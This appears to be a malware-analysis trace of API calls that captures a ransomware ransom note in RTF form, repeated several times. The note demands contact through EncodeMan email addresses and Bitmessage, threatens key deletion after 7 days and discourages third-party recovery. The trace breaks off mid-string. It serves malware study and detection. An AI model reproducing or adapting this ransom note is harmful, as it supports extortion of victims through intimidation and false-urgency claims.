you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.345] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.345] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2373dc8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 